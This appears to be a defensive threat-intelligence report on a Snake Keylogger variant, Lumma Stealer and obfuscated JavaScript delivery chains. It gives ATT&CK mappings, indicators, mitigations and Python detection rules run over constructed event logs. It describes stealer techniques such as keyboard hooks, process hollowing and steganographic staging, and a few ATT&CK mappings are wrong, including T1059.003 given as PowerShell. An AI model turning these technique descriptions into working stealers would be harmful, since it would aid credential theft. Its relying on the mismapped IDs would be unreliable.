Full Report
A new variant of the Snake Keylogger malware is being used to actively target Windows users located in China, Turkey, Indonesia, Taiwan, and Spain. Fortinet FortiGuard Labs said the new version of the malware has been behind over 280 million blocked infection attempts worldwide since the start of the year. "Typically delivered through phishing emails containing malicious attachments or links,
Analysis Summary
# Tool/Technique: Snake Keylogger (New Variant)
## Overview
A new variant of the Snake Keylogger malware is actively targeting Windows users in China, Turkey, Indonesia, Taiwan, and Spain. Its primary purpose is to steal sensitive information from infected systems by logging keystrokes, harvesting credentials stored by web browsers, and monitoring the clipboard.
## Technical Details
- Type: Malware family
- Platform: Windows
- Capabilities: Keystroke logging, credential theft (browsers), clipboard monitoring, information exfiltration via SMTP and Telegram. Notable for initial delivery via AutoIt-compiled binaries.
- First Seen: Information not explicitly available for the variant, but global blocked attempts reported since the start of the year.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment
    - T1566.002 - Spearphishing Link
- TA0003 - Persistence
  - T1547 - Boot or Logon Autostart Execution
    - T1547.001 - Registry Run Keys / Startup Folder
- TA0005 - Defense Evasion
  - T1055 - Process Injection
    - T1055.012 - Process Hollowing
- TA0009 - Collection
  - T1056 - Input Capture
    - T1056.001 - Keylogging
  - T1115 - Clipboard Data
## Functionality
### Core Capabilities
- **Information Theft:** Logs keystrokes by installing a low-level keyboard hook via `SetWindowsHookExA` with the `WH_KEYBOARD_LL` hook type (value 13).
- **Credential Harvesting:** Targets credentials from browsers such as Chrome, Edge, and Firefox.
- **Geolocation:** Retrieves the victim's IP address and geolocation using external services like `checkip[.]dyndns[.]org`.
- **Exfiltration:** Sends stolen data to the attacker via SMTP and Telegram bots.
### Advanced Features
- **AutoIt Delivery:** The main payload is delivered and executed within an AutoIt-compiled binary, complicating static analysis and mimicking benign automation tools.
- **Persistence Mechanism:** Drops `ageless.vbs` into the Windows Startup folder to ensure execution upon system reboot.
- **Process Hollowing:** Injects the main payload into a legitimate .NET process (e.g., `regsvcs.exe`) for stealth.
- **File Dropping:** Drops a copy of itself as `ageless.exe` into `%Local_AppData%\supergroup`.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: `ageless.exe`, `ageless.vbs`
- Registry Keys: None provided; persistence is achieved through the Startup folder (`ageless.vbs`), which falls under T1547.001 alongside registry Run keys.
- Network Indicators: `checkip[.]dyndns[.]org`
- Behavioral Indicators: Use of `SetWindowsHookExA` with `WH_KEYBOARD_LL`, dropping files in `%Local_AppData%`, process hollowing into `regsvcs.exe`.
## Associated Threat Actors
- Not explicitly named, but linked to activity resulting in over 280 million blocked attempts globally.
## Detection Methods
- Signature-based detection: Signatures for the AutoIt-compiled binary structure of the dropper.
- Behavioral detection: Monitoring for the creation of `ageless.vbs` in the Startup folder, installation of a low-level keyboard hook (`WH_KEYBOARD_LL`), and process injection into legitimate processes such as `regsvcs.exe`.
- YARA rules: Targeting structures common in AutoIt payloads or specific strings/API calls.
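The behavioral detections listed above, as an added example that is not part of the original report: a small rule set run over constructed Sysmon-like events, flagging the Startup-folder `.vbs` drop, the `supergroup` payload copy, and `regsvcs.exe` started by a parent in a user-writable path. The event shape, the `USER_WRITABLE_RE` heuristic and the sample paths are assumptions made for the example.

```python
# Behavioural detection for the Snake Keylogger indicators listed above: a .vbs
# dropped into the Startup folder, a payload copy under %LocalAppData%\supergroup,
# and regsvcs.exe (the hollowing host) started by a parent in a user-writable path.
# Events are constructed in a Sysmon-like shape; they are not a real feed.
import re

STARTUP_VBS_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.vbs$", re.I)
SUPERGROUP_RE = re.compile(r"\\AppData\\Local\\supergroup\\", re.I)
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)  # assumed heuristic
HOLLOWING_HOSTS = {"regsvcs.exe"}  # injection target named in the report

def check_event(event):
    """Return the detection names triggered by a single event."""
    hits = []
    if event.get("type") == "file_create":
        path = event.get("path", "")
        if STARTUP_VBS_RE.search(path):
            hits.append("startup_vbs_drop")
        if SUPERGROUP_RE.search(path):
            hits.append("supergroup_payload_drop")
    elif event.get("type") == "process_create":
        image = event.get("image", "").rsplit("\\", 1)[-1].lower()
        if image in HOLLOWING_HOSTS and USER_WRITABLE_RE.search(event.get("parent_image", "")):
            hits.append("hollowing_host_from_user_path")
    return hits

def scan(events):
    """Map each triggered detection name to the events that fired it."""
    findings = {}
    for ev in events:
        for name in check_event(ev):
            findings.setdefault(name, []).append(ev)
    return findings

STARTUP = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [  # constructed sample; user and paths are illustrative only
    {"type": "file_create", "path": r"C:\Users\alice\AppData\Local\supergroup\ageless.exe"},
    {"type": "file_create", "path": STARTUP + r"\ageless.vbs"},
    {"type": "process_create",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\supergroup\ageless.exe"},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for name, evs in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {len(evs)} event(s)")
```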
## Mitigation Strategies
- Implement robust email filtering to block malicious attachments and links associated with phishing campaigns.
- Monitor for unusual process injection techniques like process hollowing targeting legitimate Windows processes.
- Monitor the local application data and Startup folders for unauthorized file creation (`ageless.exe`, `ageless.vbs`).
- Use application allowlisting or application control to restrict execution of unapproved AutoIt-compiled binaries.
## Related Tools/Techniques
- Other Stealers (Lumma Stealer, discussed in the text)
- Use of legitimate scripting languages (like AutoIt) for camouflage.
***
# Tool/Technique: Lumma Stealer
## Overview
Lumma Stealer is an information stealer malware distributed via a multi-stage attack chain often leveraging compromised infrastructure, particularly associated with educational institutions and malicious LNK files disguised as PDFs. It is designed to steal passwords, browser data, and cryptocurrency wallet information.
## Technical Details
- Type: Malware family (Stealer)
- Platform: Windows
- Capabilities: Theft of passwords, browser data, and cryptocurrency wallets via a multi-stage infection chain originating from LNK files.
- First Seen: Recent activity detailed in the article.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
  - T1566 - Phishing (Implied by malicious document delivery)
- TA0002 - Execution
  - T1204 - User Execution
    - T1204.002 - Malicious File
- TA0003 - Persistence
  - T1547 - Boot or Logon Autostart Execution (Likely implemented in later stages)
- TA0009 - Collection
  - T1555 - Credentials from Web Browsers
  - T1115 - Clipboard Data
## Functionality
### Core Capabilities
- **Payload Delivery via LNK:** Uses LNK files disguised as PDFs, hosted on WebDAV servers, to initiate execution.
- **Multi-Stage Infection:** LNK executes PowerShell, which fetches obfuscated JavaScript, which in turn executes another PowerShell script to download and execute the final Lumma Stealer payload.
- **Data Theft:** Targets passwords, browser data, and crypto wallets.
### Advanced Features
- **Steganography/Embedding:** An observed variation of the distribution chain uses steganography, embedding malicious MZ/DOS executables inside a JPG image and a text file that are downloaded via PowerShell commands.
- **Exfiltration:** Exfiltrates data to a Telegram bot operated by the attacker.
## Indicators of Compromise
- File Hashes: SHA256 hash provided for one related obfuscated JavaScript file: `944c7070cb77d937c9bae8c30a367b1c15b2f8951329cdb64d4b02a5e145ea44`
- File Names: Malicious LNK files disguised as PDFs; obfuscated JavaScript files.
- Registry Keys: [Not provided]
- Network Indicators: Connections to WebDAV servers for LNK hosting; PowerShell connection to remote servers/URL shorteners to retrieve stages.
- Behavioral Indicators: Execution chains starting from `.LNK` files leading to PowerShell and subsequent obfuscated script execution.
## Associated Threat Actors
- Threat actors leveraging compromised infrastructure associated with educational institutions.
## Detection Methods
- Detection of LNK file execution leading to PowerShell.
- Analysis of obfuscated JavaScript traffic/content.
- Monitoring for connections to unknown or suspicious WebDAV endpoints hosting seemingly innocuous files.
## Mitigation Strategies
- Disable the automatic execution features for LNK/shortcut files where possible.
- Harden web infrastructure controls to prevent compromise and subsequent hosting of malicious files.
- Implement strict execution policies preventing the running of scripts retrieved from unusual sources.
## Related Tools/Techniques
- Other Stealer malware distributed through obfuscated JavaScript.
***
# Tool/Technique: Obfuscated JavaScript Delivery Chain (General Trend)
## Overview
A technique frequently observed in recent threat activity, involving the use of heavily obfuscated JavaScript files to chain attacks, ultimately deploying stealer malware. This technique relies on scripts fetching encoded strings or staged payloads from remote sources.
## Technical Details
- Type: Technique
- Platform: Windows (Executed via script engines)
- Capabilities: Initial execution via script, fetching encoded strings/payloads from C2 or open-source services, downloading subsequent stages (e.g., JPG/TXT containing executables via steganography).
- First Seen: Recent observation cited in the context.
## MITRE ATT&CK Mapping
- TA0002 - Execution
  - T1059 - Command and Scripting Interpreter
    - T1059.003 - Windows Command Shell (PowerShell)
    - T1059.005 - Visual Basic
- TA0007 - Discovery (Fetching encoded strings)
- TA0011 - Command and Control
  - T1071 - Application Layer Protocol
## Functionality
### Core Capabilities
- **Obfuscation:** Hiding malicious logic within JavaScript to evade simple inline detection.
- **Staged Downloads:** Using the initial script to download further components, including PowerShell scripts.
- **Encoded Payload Retrieval:** Fetching encoded strings from external sources (such as open-source services) to construct the final command payload.
### Advanced Features
- **Steganography:** One observed variant uses steganography within a JPG image and a TXT file downloaded by PowerShell to embed and deploy the final malicious MZ DOS executable payload.
- **Multiple C2 Components:** Utilizing an IP address and a URL shortener simultaneously to retrieve payloads.
## Indicators of Compromise
- File Hashes: SHA256 hash provided for one related obfuscated JavaScript file: `944c7070cb77d937c9bae8c30a367b1c15b2f8951329cdb64d4b02a5e145ea44`
- File Names: Obfuscated JavaScript files (e.g., `.js` extensions in unusual locations).
- Registry Keys: [Not detailed]
- Network Indicators: Connections to IP addresses and URL shorteners for payload retrieval.
- Behavioral Indicators: Execution of JavaScript leading directly to encoded string retrieval or PowerShell invocation.
## Associated Threat Actors
- Generic threat actors utilizing modern infection chains for stealer distribution.
## Detection Methods
- Signature-based detection targeting known malicious JavaScript obfuscation patterns.
- Deep packet inspection to identify downloads of executables disguised within image/text files (steganography detection).
- Behavioral monitoring of JavaScript execution leading to PowerShell execution.
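The process-chain detections named here and in the Lumma Stealer section above (shortcut-launched PowerShell, a script host running a `.js` file, then a further PowerShell stage, plus WebDAV hosting of the lure), as an added example that is not part of the original report. It walks the parent chain of constructed Sysmon-like process-create events; the event fields, pids, paths and the 203.0.113.5 address are assumptions made for the example.

```python
# Process-ancestry detection for the staged chain above: PowerShell launched by
# a shortcut, a script host running a .js file, then a second PowerShell stage,
# plus a WebDAV UNC path check. Events are constructed, in a Sysmon-like shape.
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# \\host@SSL\..., \\host@port\... and DavWWWRoot are Windows WebDAV UNC forms
WEBDAV_RE = re.compile(r"\\\\[^\\]+@(ssl|\d+)\\|davwwwroot", re.I)

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestry(index, pid):  # image names from the process up through every known parent
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(_name(index[pid]["image"]))
        pid = index[pid].get("ppid")
    return chain

def detect(index, ev):
    """Detections for one PowerShell process-create event (empty otherwise)."""
    if _name(ev["image"]) not in POWERSHELL:
        return []
    hits = []
    chain = ancestry(index, ev["pid"])  # [self, parent, grandparent, ...]
    parent = index.get(ev.get("ppid"), {})
    if (_name(parent.get("image", "")) in SCRIPT_HOSTS
            and ".js" in parent.get("cmdline", "").lower()
            and any(n in POWERSHELL for n in chain[2:])):
        hits.append("js_host_between_powershell_stages")
    if WEBDAV_RE.search(ev.get("cmdline", "")):
        hits.append("webdav_path_in_powershell_cmdline")
    return hits

def scan(events):  # pid -> detections for every event that triggered at least one
    index = {ev["pid"]: ev for ev in events}
    return {ev["pid"]: h for ev in events if (h := detect(index, ev))}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; pids, paths and 203.0.113.5 are illustrative only
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": PS,
     "cmdline": r"powershell.exe -NoProfile -File \\203.0.113.5@80\DavWWWRoot\invoice.ps1"},
    {"pid": 30, "ppid": 20, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\update.js"},
    {"pid": 40, "ppid": 30, "image": PS, "cmdline": "powershell.exe -NoProfile -EncodedCommand <redacted>"},
    {"pid": 50, "ppid": 10, "image": PS, "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]
```

Running `scan(SAMPLE_EVENTS)` reports pid 20 for the WebDAV path and pid 40 for the PowerShell-to-JavaScript-to-PowerShell chain, while the interactive PowerShell (pid 50) is not flagged.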
## Mitigation Strategies
- Restrict execution of scripts from non-standard file types or unexpected locations.
- Implement EDR solutions capable of de-obfuscating and analyzing script behavior dynamically.
## Related Tools/Techniques
- PowerShell execution chains
- Steganography utilized for payload delivery.